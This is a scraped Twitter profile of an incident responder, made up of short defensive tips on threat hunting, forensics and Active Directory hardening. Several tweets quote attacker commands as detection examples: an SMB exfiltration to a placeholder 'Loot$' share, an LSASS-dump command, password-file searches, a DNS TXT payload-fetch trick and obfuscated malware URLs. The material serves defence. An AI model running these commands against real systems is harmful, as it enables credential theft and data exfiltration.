Stephan Berger (@malmoeb)

Followers: 24,700 | Following: 1,807 | Media: 978 | Statuses: 2,275
@malmoeb
Stephan Berger
3 years
#ThreatHunting : Check the following 🔑: "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v user 💡 If you got a hit, the user is "hidden" 🥷 from the login screen, and you might have a backdoor account on this system. 🔍 #CyberSecurity
19
380
1K
@malmoeb
Stephan Berger
2 years
1/ Ouch. 🫣 A TA brute-forced the password of the domain admin. The customer first suspected an internal compromise, but upon a deeper investigation of this incident, we quickly realized that the IP address was the internal address of a Cisco ASA VPN box. 🧵 #CyberSecurity
Tweet media one
29
262
1K
@malmoeb
Stephan Berger
2 years
1/ #Linux #Forensics : pssst... I will now reveal my favorite interview question for candidates who want to work in our IR team ;) "In the process list, I see a (running) binary, but the binary is no longer present on disk. How can I restore the original binary? (screenshot 👇)"
Tweet media one
39
217
998
@malmoeb
Stephan Berger
2 years
1/ In one ransomware case, the attackers started an EXE file that dropped the vulnerable GIGABYTE driver to C:\Windows\System\gdrv.sys. The TA used the vulnerable driver to load a malicious driver as a kernel driver, which hunted and killed Symantec processes. 🧵 #CyberSecurity
Tweet media one
19
264
741
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting AnyDesk, Splashtop, Atera, TeamViewer, SupRemo, ScreenConnect, Remote Utilities: After breaching a network, attackers install, besides the obvious backdoors, other (legitimate) remote desktop products that can be used to re-enter the network. 🧵 #CyberSecurity
25
177
744
@malmoeb
Stephan Berger
2 years
1/ Did you know that the "Zone.Identifier" Alternate Data Stream (ADS) not only records whether a file was downloaded from the Internet (ZoneId=3), but also from which URL and the Referrer from which the page was visited? PS> Get-Content <filename> -Stream Zone.Identifier
Tweet media one
16
180
730
@malmoeb
Stephan Berger
2 years
1/ IR tip: During the first conversation with the affected customer, ask for their public IP range(s). Next, check this IP range on @shodanhq (filter: "net:<ip>/<subnet>"). This has two advantages: 🧵 #CyberSecurity
11
170
715
@malmoeb
Stephan Berger
1 year
Please do the incident response team a favor, and check that the X-Forwarded-For Header is set on all your reverse proxies / load-balancers / etc. They will thank you later.
22
110
635
@malmoeb
Stephan Berger
2 years
1/ Interesting infection chain: When an LNK file is double-clicked, a decoy PDF is displayed & a DOT file is downloaded and placed in the Microsoft Word Startup folder. The downloaded DOT file contains macro code that is now loaded every time Word is started. Let's dive in 🧵
Tweet media one
12
209
623
@malmoeb
Stephan Berger
8 months
We see a lot of threat actors in our Incident Response cases who disable or tamper with the local AV. The website has a copy & paste script to turn off most of Defender's features. [1] How many of these modifications (or deactivations) will trigger an
Tweet media one
8
178
608
@malmoeb
Stephan Berger
9 months
The customer contacted us because "Microsoft 365 Defender has detected a security threat", more precisely, the alert "Anomalous Token involving one user" was raised. We tasked the customer to give us access to their Azure Tenant so that we could investigate the logins and
Tweet media one
19
111
606
@malmoeb
Stephan Berger
2 years
Real-World #PingCastle Finding #8 : Non-admin users can add computers to a domain. A customer called us because he discovered two new computer objects. Such new computer objects can be a sign of more targeted attacks against the #ActiveDirectory . 1/8 #CyberSecurity #dfir
Tweet media one
12
143
591
@malmoeb
Stephan Berger
1 year
1/ #Malware created a new ExclusionPath for Windows Defender - so that the dropped file will not be scanned anymore (see screenshot below). I was only aware of the PowerShell way of creating a new Defender exclusion; the WMIC technique was novel to me. 🧵
Tweet media one
15
163
593
@malmoeb
Stephan Berger
2 years
/1 Repeat after me: AV scans and a password change are not enough after a full AD compromise. A company has already been encrypted twice and asked us for a second opinion. The responders did a password change with an AV scan of the machines... What could possibly go wrong? 🧵
20
116
521
@malmoeb
Stephan Berger
2 years
1/ I ♥️ (digital) forensics because even if an attacker deleted event logs to cover his tracks, we can still find other artifacts that help us retrace his steps on the network. In one case, the attacker used RDP to move laterally on the network but deleted the TerminalSVC logs.
Tweet media one
9
123
511
@malmoeb
Stephan Berger
2 years
1/ We recently had a case where a TA compromised an Azure Global Admin account. The TA used the compromised account to spin up over 200 VMs to mine cryptos with it. The compromise was only noticed due to skyrocketing Azure costs. 💸 🧵 #CyberSecurity
28
108
512
@malmoeb
Stephan Berger
2 years
1/ For the people who monitor PowerShell logs or command lines, these two commands would also be worth an alert:
Get-ChildItem C:\Path -Recurse -File -Filter *pass*
Get-ChildItem C:\Path -Recurse -File -Filter *kdbx*
The search for password files is obvious. 🧵
6
96
508
@malmoeb
Stephan Berger
20 days
In a recent incident response case, the attacker ran the following command, trying to dump lsass with the well-known comsvcs.dll technique: %COMSPEC% /Q /c cmd.eXE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do
Tweet media one
6
142
509
@malmoeb
Stephan Berger
8 months
1/ "Mimikatz Security Support Provider mimilib.dll will be registered as a Windows Security Package. Once the Security Package is registered and the system is rebooted, the mimilib.dll will be loaded into lsass.exe process memory and intercept all logon passwords next time
Tweet media one
6
131
496
@malmoeb
Stephan Berger
8 months
I tweeted recently about how an attacker used a misconfiguration in ADCS (Active Directory Certificate Services) to gain Domain Admin rights within the network. @JimSycurity made me aware of Locksmith [1]: A small tool built to detect and fix common misconfigurations in Active
Tweet media one
6
120
489
@malmoeb
Stephan Berger
3 years
#Linux #ThreatHunting : The SSH-Agent creates a socket file when logging in, which can be opened by a user with administrative privileges (and can be used for lateral movement). If your Organisation records the shell history, search for the following commands (and keywords): 👇 1/
8
131
479
@malmoeb
Stephan Berger
2 years
#ThreatHunting : When investigating a potentially compromised Exchange server, one of the first steps I take is to search the MFT for .aspx files (with @velocidex 's MFT Hunt, for example). Examine the results for suspicious file names or paths. (1/3) #CyberSecurity
Tweet media one
8
133
481
@malmoeb
Stephan Berger
2 years
1/ Linux #Hardening and #ThreatHunting The screenshot below is from Microsoft [1] - using XorDdos as an example, we can learn a lot about Linux forensics and hardening. 🧵 #CyberSecurity
Tweet media one
10
149
473
@malmoeb
Stephan Berger
2 years
1/ I presented 10 #ActiveDirectory hardening measures a few weeks ago, and I will tweet my recommendations in the next ten days. The list is neither prioritised nor complete, but it might give companies and administrators good input on improving (AD) security. 🧵 #CyberSecurity
5
138
477
@malmoeb
Stephan Berger
2 years
1/ USB malware, part 4: Blast from the past. Again, a user executed a shortcut on a USB stick, which led to the execution of the following commands: 🧵 #CyberSecurity
8
106
449
@malmoeb
Stephan Berger
3 years
Internal #ThreatHunting Tip: Start collecting DHCP logs in your SIEM. If the computers and servers in the network have been named according to a naming scheme, it is easy to search for outliers in the hostnames. Start hunting for rogue devices and backdoors. 👇 #CyberSecurity
14
100
418
@malmoeb
Stephan Berger
2 years
No way, this really works! 🤯 % dig txt dfir.<redacted>.<tld> +short [System.Reflection.Assembly]::LoadWithPartialName('.Forms'); [.Forms.MessageBox]::Show('DFIR FTW!','BlueTeam <3')
Tweet media one
@Alh4zr3d
Alh4zr3d
2 years
Sexy tip for your red team ops: avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with your payload at one of your (unburned) domains and do this: "powershell . (nslookup -q=txt )[-1]"
45
407
2K
7
111
437
@malmoeb
Stephan Berger
2 years
1/ @Unit42_Intel published an interesting way of how malware bypassed DNS and DNS logging by using legitimate services like ip-api[.]com for domain name resolution(s). Example: wget Output: success,[...],91.236.220.100 🧵 #CyberSecurity
7
117
410
@malmoeb
Stephan Berger
3 years
Three #Windows #Hardening steps to make relaying attacks more difficult:
1⃣ Disable LLMNR, NBT-NS and WPAD requests (I still see WPAD requests now and then).
2⃣ Disable IPv6 (internally)
3⃣ Prevent users from joining computers to the domain - (ms-DS-MachineAccountQuota)
1/👇
13
98
410
@malmoeb
Stephan Berger
1 year
1/ We recently had an interesting #Azure case where the TA, instead of creating a new Inbox Rule, added email addresses of interest to the list of blocked senders and domains. The incoming emails will get flagged as spam and moved to the Junk email folder. 📂 🧵
10
89
389
@malmoeb
Stephan Berger
2 years
1/ KMSPico is a software to (illegally) activate Windows installations. Interestingly, KMSPico is a frequent finding in our Compromise Assessments, where users activate Windows versions of home or company computers with this software.
Tweet media one
15
117
377
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting : In a compromised network, we saw the following request in the proxy logs: www.advanced-ip-scanner[.]com/checkupdate.php?[..] This scanner is trendy among ransomware groups and has been mentioned in reports by @TheDFIRReport , among others. [1] 🧵
11
122
368
@malmoeb
Stephan Berger
4 months
In-depth examination of the Sliver C2 framework. I highly recommend reading this series for every BlueTeamer to understand the internals and building blocks of a (modern) C2 framework.
Tweet media one
0
137
374
@malmoeb
Stephan Berger
2 years
When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$" If Responder could capture the hash, the firewall allows outgoing SMB connections 🚨 ➡️
Tweet media one
9
84
353
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting Another one for the people who monitor PowerShell logs or command lines: Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
3
98
355
@malmoeb
Stephan Berger
8 months
A threat actor installed the PowerShell version of SystemBC as a backdoor on a recent engagement (different C2 address, but the same code as this sample here on VT [1]) An EDR product was installed on the affected host(s) after the attacker created a malicious scheduled task,
Tweet media one
4
80
357
@malmoeb
Stephan Berger
2 years
1/ "By using DoH, attackers can hide DNS queries from C&C domains. If SSL/TLS traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS queries to the C&C server will therefore go unnoticed." [1] 🧵 #CyberSecurity
Tweet media one
10
126
345
@malmoeb
Stephan Berger
2 years
1/ #Hardening : More and more attackers in ransomware cases are attacking the ESXi and vCenter infrastructure to encrypt a large part of the systems in a company within a short time.
13
79
339
@malmoeb
Stephan Berger
2 years
1/ Patient Zero was an internet-exposed server with single-factor RDP. The attackers brute-forced the password of an atypical username that was not easy to guess. #CyberSecurity #dfir
Tweet media one
12
73
332
@malmoeb
Stephan Berger
9 months
On a recent Incident Response case, we encountered the PowerShell code depicted in the screenshot below. Welcome Cloudflare Tunnels on the stage. The TA downloaded cloudflared (the executable name of the CF Tunnels) installer package from the official GitHub repository from
Tweet media one
11
89
336
@malmoeb
Stephan Berger
2 years
1/ @hackerkartellet and I were investigating an IIS web server exhibiting strange behavior (screenshot below). Even though the customer reinstalled the server, the AppPools were still crashing regularly after the reinstall. Let's dig in. 🕵️ #CyberSecurity
Tweet media one
11
85
332
@malmoeb
Stephan Berger
2 years
Easy way to install tools on a new machine:
winget install --id Microsoft.VisualStudioCode
winget install --id Microsoft.Powershell
winget install --id Notepad++.Notepad++
winget install --id
winget install --id Git.Git
winget search <term>
6
68
331
@malmoeb
Stephan Berger
1 year
1/ In a recent investigation, we encountered HackBrowserData, "a command-line tool for decrypting and exporting browser data (passwords, history, cookies, bookmarks [..]) from the browser." [1] Symantec also reported the usage of such software in a breach this year. [2] 🧵
Tweet media one
2
81
329
@malmoeb
Stephan Berger
2 years
1/ Another day, another Sin. Today's #3 : Ignoring or misinterpreting AV alerts. If I had received a dime for every time I mentioned Florian's cheat sheet, I wouldn't have to work anymore. 😂 🧵 #CyberSecurity
Tweet media one
3
77
323
@malmoeb
Stephan Berger
1 year
In my #FIRSTCON23 presentation, I said if an executable or a file is written into C:\Users\Public\, an alert should be raised immediately. Period. TAs and APTs be like:
Tweet media one
8
62
321
@malmoeb
Stephan Berger
2 years
1/ Perhaps a lesser known "feature" of Microsoft Authenticator, but the diagnostic data can be very helpful in investigating a compromised #Azure account where MFA is enabled but the user claims not to have confirmed the MFA Consent Prompt. 🧵
4
97
319
@malmoeb
Stephan Berger
7 months
New blog post: AWS Ransomware An attacker compromised an AWS account and subsequently deleted all buckets in the S3 storage. They left a 'recovery' binary behind, which we analyzed :) Enjoy.
Tweet media one
5
97
312
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting : A few weeks ago, during an IR case, we found SystemBC, the PowerShell version, in a user's run key (screenshot below). The (more or less) same code was documented in March this year, with 0 detections at VT back then [1]. 🧵 #CyberSecurity
Tweet media one
3
94
308
@malmoeb
Stephan Berger
3 months
Attackers know how to exploit misconfigured Discretionary Access Control Lists (DACLs) in Active Directory. Do you, as a defender, know it, too? Recommend reading: It details the theory behind DACLs and ACEs (Access Control Entries), practical methods
Tweet media one
2
74
308
@malmoeb
Stephan Berger
4 months
You might want to add to your list of blocked domains on your proxy / fw: "TryCloudflare will launch a process that generates a random subdomain on . Requests to that subdomain will be proxied through the Cloudflare network to your
Tweet media one
8
63
307
@malmoeb
Stephan Berger
1 year
1/ On a recent investigation, we found traces of FileZilla as the exfiltration tool of choice. The great thing is: The file recentservers.xml contains recently accessed servers :) 🧵
Tweet media one
5
58
304
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting : With NSudo, attackers can execute programmes (or commands) as "TrustedInstaller", and accordingly the actions are carried out with SYSTEM rights. Among other things, attackers use NSudo to change various registry keys in order to disable Windows Defender. 🧵
Tweet media one
4
94
306
@malmoeb
Stephan Berger
2 years
1/ Number #3 of the #ActiveDirectory hardening measures: Passwords 🧵 #CyberSecurity
Tweet media one
4
55
297
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting : "To maintain access in a compromised network, [..] actor adds or creates a new user account, frequently named DefaultAccount [..] to the device using the command net user /add." [1] 🔍 for newly created (local) accounts and hunt for default accounts 🧵
5
89
297
@malmoeb
Stephan Berger
2 years
1/ We analyzed a breached server and found the IP address and domain from which the TA downloaded additional tools onto the server. The initial breach happened a few months ago, but the TA uses the same server till today. 🧵
9
108
291
@malmoeb
Stephan Berger
2 years
IMO a must-read for every defender - a nice list of various techniques for circumventing modern EDR agents. The article is well written, with many links to other resources. Thanks for sharing @_vivami 💙 #CyberSecurity
1
86
295
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting for #AsyncRAT We have various ways to find infected hosts with AsyncRAT:
1⃣ Usage of standard C2 ports
2⃣ Hunting for persistence
3⃣ Mutexes FTW
4⃣ Last but not least, hunting for dropped DLLs
Let's go 🤠🧵 #CyberSecurity
7
109
285
@malmoeb
Stephan Berger
2 years
1/ Number #2 of the #ActiveDirectory hardening measures: Service Accounts 🧵 #CyberSecurity
Tweet media one
6
59
285
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting : "16777216" as Source Network Address could indicate an RDP tunnel via ngrok. @SecurityAura and I have seen the value ":%16777216" as Source Network Address within the MS-Windows-TerminalServices-LocalSessionManager/Operational Log in different investigations.
Tweet media one
8
77
278
@malmoeb
Stephan Berger
2 years
1/ Defender prevented the execution of the malware 'Casdet' on an endpoint. Especially with AV alerts, besides the detection, I am always interested in the birth time of the detected file. Was the file detected when it was written to the disk, or since when is it present? 🧵
Tweet media one
9
55
275
@malmoeb
Stephan Berger
9 months
Because I talked recently about my "Seven Sins," here is another classic: An external entity informed our customer that their network was compromised (and also delivered evidence that the attackers might still be inside the network). In the initial call, we asked if the customer
Tweet media one
11
62
272
@malmoeb
Stephan Berger
2 years
1/ @rootsecdev published a blog post where common misconfigurations inside the Conditional Access Policies in Azure are discussed. In an Azure Tenant from a customer, the following CA policy was implemented: Require MFA for administrative users. 🧵
Tweet media one
2
69
272
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting : #QuasarRAT is another RAT we see from time to time in our IR cases and was also used against NATO facilities in March. [1] We can hunt for
1⃣ The default port within the FW logs
2⃣ Mutexes
3⃣ User-Agent
4⃣ Persistence mechanisms 🧵
9
104
266
@malmoeb
Stephan Berger
2 years
1/ Huh, what kind of IP address is that? Like @mgreen27 , we often use EvtxHunter from @velocidex Velociraptor to search the EventLogs. [1] @mgreen27 even wrote an artifact for finding Public IPs in the RDPAuth log. [2] 🧵 #CyberSecurity
Tweet media one
10
75
264
@malmoeb
Stephan Berger
2 years
1/ "PDQ Deploy is a software deployment tool that allows system administrators to silently install almost any application or patch to multiple Windows computers simultaneously." [1] We have investigated a ransomware case where the TA used PDQ to carry out the encryption. 🧵
Tweet media one
5
67
264
@malmoeb
Stephan Berger
1 year
1/ Number #8 of the #ActiveDirectory hardening measures: Print Spooler Service 🧵 #CyberSecurity
Tweet media one
4
69
263
@malmoeb
Stephan Berger
6 months
I love browsing the detection rules from @elastic to see if I'm unaware of a technique or tool or to get some new ideas about detection rules, which I can later pass on to our clients. Huge thanks for providing such an excellent service - 🥇
Tweet media one
0
63
265
@malmoeb
Stephan Berger
2 years
/1 Sin #4 : Insufficient AD Hardening Of course, there are many AD attack paths, misconfigurations, and ways to get DA credentials. But still, companies should try to set the bar as high as possible to force attackers to make mistakes we might detect. 🧵 #CyberSecurity
6
79
262
@malmoeb
Stephan Berger
2 years
1/ Did you know that @shodanhq keeps a history from the scan-results of a system exposed to the internet? In the case of a new IR investigation, it can be valuable to briefly check the customer's public IP range to see if any systems have been vulnerable in the past. #dfir
Tweet media one
2
63
260
@malmoeb
Stephan Berger
2 years
1/ While analyzing AutoRuns entries in a Compromise Assessment, my teammate @newtt42 found four executables with different names but with the same hash (in the C:\Windows directory). The binaries were run as services with the following names: JXds, vdEp, JXmM, PTLt. 🧵
Tweet media one
6
80
256
@malmoeb
Stephan Berger
1 year
1/ Number #10 of the #ActiveDirectory hardening measures: Easy Wins (for Attackers) 🧵 #CyberSecurity
Tweet media one
5
66
257
@malmoeb
Stephan Berger
1 year
The amount of infected USB sticks used in customer networks still surprises me. The alerts spring up like mushrooms 😅 Here is an example from an infected USB stick containing a VBE file where the user executed a malicious file:
Tweet media one
14
46
254
@malmoeb
Stephan Berger
2 years
Hunting for PUAs, malware or exfiltration software which adds a new rule to the local firewall on clients or servers. @velocidex 's PowerShell artifact FTW! Power-🐚: Get-NetFirewallApplicationFilter -All | Select *| ? { $_.AppPath -like "*\users\*" } | Select AppPath
Tweet media one
2
65
256
@malmoeb
Stephan Berger
2 years
I wonder if the attacker found out why the tool didn't work 🤔🤪 Solely copying & pasting the command line won't do the trick 🙈 Reference: #CyberSecurity
Tweet media one
Tweet media two
6
35
254
@malmoeb
Stephan Berger
8 months
I recently gave an (internal) presentation about how one can bypass AMSI on a Windows 10 machine. Apparently, some of the techniques I showcased are no longer possible on Windows 11. But fear not; Gustav Shen has written an excellent piece about how to bypass AMSI on Windows
Tweet media one
0
101
253
@malmoeb
Stephan Berger
2 years
1/ #Azure In a recent case, the TA was able to compromise the user despite MFA (MFA fatigue). After logging in, the attacker registered another mobile number as "Alternate Mobile Phone Call". In the audit logs, we see this event within "Authentication Methods": 🧵 #DFIR
Tweet media one
5
72
252
@malmoeb
Stephan Berger
1 year
1/ Number #7 of the #ActiveDirectory hardening measures: Harden critical accounts 🧵 #CyberSecurity
Tweet media one
5
78
247
@malmoeb
Stephan Berger
1 year
"Microsoft uses some undocumented back-end magic to record events by default that it deems to be malicious. Thus, Event ID 4104 events can be useful to your analysis even in environments where Script Block Logging has not been fully enabled." [1] @nas_bench researched this
Tweet media one
6
70
243
@malmoeb
Stephan Berger
2 years
1/ "The custom fields modified in the HTTP request include a hardcoded user-agent with the computer name [..]" [1] I'm a huge fan of proxy logs and analyzing them ([2,3]). Search your proxy with a regex matching your internal hostnames - you might also catch an APT. 🪝 🧵
Tweet media one
8
44
249
@malmoeb
Stephan Berger
2 years
"@Mandiant recommends organizations review GPO settings to identify groups and accounts that have GPO edit permissions. These represent an extended attack surface for hardening and protection." (page 84) Quickly done with @velocidex Velociraptor 💪👇
Tweet media one
1
85
245
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting : #BUMBLEBEE seems to be the new kid on the (malware loader) block. For companies that record proxy-logs and have access to the user agents used (TLS must be broken up), I see three hunting possibilities to detect a Bumblebee infection with those logs.
4
73
244
@malmoeb
Stephan Berger
2 years
A good reminder that any launch of an executable or script from C:\Users\Public\ should be investigated thoroughly. #CyberSecurity
Tweet media one
0
69
240
@malmoeb
Stephan Berger
2 years
1/ One thing I often do and also recommend in my #ThreatHunting workshops is to look at the code of attack tools and exploits to understand what forensic artifacts they leave behind. Today I looked at the "Windows Silent Process Exit Persistence" module from @metasploit .
Tweet media one
5
77
242
@malmoeb
Stephan Berger
1 month
During a recent Incident Response case, it was evident that the attacker disabled Defender on various hosts during a timeframe of a few hours. Would you detect such behavior in your environment? Do you monitor for AV disabling and, on top of that, monitor for a threshold of
Tweet media one
5
57
244
@malmoeb
Stephan Berger
2 years
/1 #Hardening "The autologon feature is provided as a convenience. [..] Additionally, when autologon is turned on, the password is stored in the registry in plain text" 👀 Let's hunt for these passwords and assess the damage if an attacker could get ahold of this password(s).🧵
Tweet media one
10
87
241
@malmoeb
Stephan Berger
2 years
1/ #ThreatHunting While analyzing AutoRuns entries on a Compromise Assessment or an IR case, would you take a second look at the nssm.exe binary running as a service (picture)? Hopefully - nssm.exe was used in an IR case by attackers to start ngrok as a service. Read more: 🧵
Tweet media one
7
81
239
@malmoeb
Stephan Berger
2 years
1/ #IR -Tip: One of the (many) tasks to do after a compromise of an (AD) network is to change ALL passwords (from users to service accounts). This step is listed as #1 on the excellent "post compromise active directory checklist" from @UK_Daniel_Card (👏). 🧵 #CyberSecurity
Tweet media one
13
71
237
@malmoeb
Stephan Berger
2 years
1/ Another IR take from last week: Scan your perimeter regularly for open ports and services! A customer has (internally) deployed a Tomcat with a default configuration. Due to an (incorrect) reverse proxy configuration, the /manager endpoint was exposed to the Internet. .. 🧵
11
74
233
@malmoeb
Stephan Berger
2 years
1/ New years resolution 🍾: Enable PS Script Block logging and monitor these logs 🙏 In this year's "Year in Review" of @TalosSecurity , the PowerShell Invoke-Expression is listed as number 1⃣ of the most alerted Behavioral Protection signatures. [1] 🧵 #CyberSecurity
Tweet media one
5
81
227
@malmoeb
Stephan Berger
3 years
Another take about anti-virus logs: For many IT administrators, once the local AV has detected a malicious file and quarantined or deleted it, the threat is gone. Or when the AV has prevented malicious code from running. Practice shows that this assumption is wrong. #DFIR
Tweet media one
12
64
227
@malmoeb
Stephan Berger
2 years
1/ Yesterday in the office, we discussed different ways to obfuscate a URL. Let's take a current example from @abuse_ch
hXXp://107.172.76.136/topp.exe
hXXp://1806453896/topp.exe
hXXp://0x6bac4c88/topp.exe
hXXp://0153.0254.0114.0210/topp.exe
All these are valid URLs 🤯🧵
Tweet media one
5
77
226
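The four spellings in the tweet above all name the same host because URL hosts are parsed with inet_aton rules: a part starting with 0x is hex, a leading 0 means octal, and fewer than four parts let the last part fill the remaining bytes. As an added example (not code from the tweet or its author), the Python below rewrites such hosts to plain dotted-decimal form, so a proxy-log search or blocklist lookup only has to match one value; the URLs are the tweet's own, re-used as constructed sample input, and the function names are my own.

```python
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample input: the four forms listed in the tweet (defanged hXXp scheme).
SAMPLE_URLS = [
    "hXXp://107.172.76.136/topp.exe",
    "hXXp://1806453896/topp.exe",
    "hXXp://0x6bac4c88/topp.exe",
    "hXXp://0153.0254.0114.0210/topp.exe",
]

_PART_RE = re.compile(r"0[xX][0-9a-fA-F]*|[0-9]+")


def _parse_part(part: str) -> int:
    """Interpret one host part the way inet_aton does: 0x = hex, leading 0 = octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16) if len(part) > 2 else 0
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)  # raises ValueError for digits 8/9, which inet_aton also rejects
    return int(part, 10)


def canonical_ipv4(host: str) -> Optional[str]:
    """Return the dotted-quad form of an inet_aton-style host, or None if it is not an IPv4 literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART_RE.fullmatch(p) for p in parts):
        return None
    try:
        nums = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # Every part except the last must fit in one octet.
    if any(n > 255 for n in nums[:-1]):
        return None
    # The last part fills all bytes not covered by the earlier parts (a.b.c.d, a.b.c, a.b or a).
    last_bits = 8 * (5 - len(parts))
    if nums[-1] >= 1 << last_bits:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << last_bits) | nums[-1]
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def normalize_url_host(url: str) -> str:
    """Return the canonical host of a URL (defanged hXXp/hXXps accepted); non-IP hosts are returned as-is."""
    refanged = re.sub(r"^hXXp(s?)://", r"http\1://", url, flags=re.IGNORECASE)
    host = urlsplit(refanged).hostname or ""
    return canonical_ipv4(host) or host


def group_by_host(urls: List[str]) -> dict:
    """Map each canonical host to the list of original URL spellings that point at it."""
    groups: dict = {}
    for u in urls:
        groups.setdefault(normalize_url_host(u), []).append(u)
    return groups


if __name__ == "__main__":
    for host, spellings in group_by_host(SAMPLE_URLS).items():
        print(host)
        for s in spellings:
            print("   ", s)
```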
@malmoeb
Stephan Berger
7 months
This is a good article, showing how administrators can simulate risk detections for testing out Conditional Access Policies or detection capabilities. Highly recommended ☝️
Tweet media one
0
72
228
@malmoeb
Stephan Berger
5 months
I 💙 xlsxgrep. Here, I'm searching for Bitcoin addresses in a bunch of Excel files: xlsxgrep -i -P ^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$ * "xlsxgrep is a CLI tool to search text in XLSX, XLS, CSV, TSV and ODS files. It works similarly to Unix/GNU Linux grep." [1] Go and get it:
Tweet media one
5
53
223
@malmoeb
Stephan Berger
2 years
Thanks @0xtornado , your #CyberChef "CobaltStrike Shellcode Decoder Recipe" (still) works like a charm 🙏 #CyberSecurity
Tweet media one
4
68
224
@malmoeb
Stephan Berger
1 year
One of the potentially lesser-known ways to detect malicious behavior in your network is monitoring for cached schema files in the SchCache folder, as we saw in a recent #ransomware investigation (screenshot). "Every time an application connects to the directory and attempts to
Tweet media one
1
69
227
@malmoeb
Stephan Berger
8 months
In a recent Incident Response case, @hackerkartellet investigated an intrusion where the attacker used a known vulnerability (CVE-2023-27532) in an attempt to gain access to the Veeam backup server. The vulnerability can read Veeam passwords in plain text from the Veeam Backup
Tweet media one
6
58
223
@malmoeb
Stephan Berger
7 months
Interesting Business Email Compromise case from this week: After compromising a user account, the attacker collected various email addresses within the breached mailbox. The goal was to send out malicious emails to these collected addresses. Nothing new, right? However, our
Tweet media one
2
50
222
@malmoeb
Stephan Berger
2 years
1/ "They tried to stay stealthy and used the sysinternal's procdump tool, renamed in error.log to bypass Windows Defender detection and dump lsass process memory" [1] A similar trick was presented by @mrd0x in November 2021. [2] 🧵 #CyberSecurity
2
69
223
@malmoeb
Stephan Berger
2 years
#ThreatHunting : 1/ When examining AutoRuns entries during an IR or CA - would you consider a Scheduled Task with the name COMSurrogate and with the following launch string as malicious (spoiler: it is 😉)? "powershell.exe" -windowstyle hidden #CyberSecurity #dfir
3
51
219
@malmoeb
Stephan Berger
2 years
1/ A lot has been written about Named Pipes hunting, especially for finding Cobalt Strike. Among others, @svch0st showcased how to find CS's (default) named pipes with @velocidex Velociraptor. [1] 🧵 #CyberSecurity
5
63
220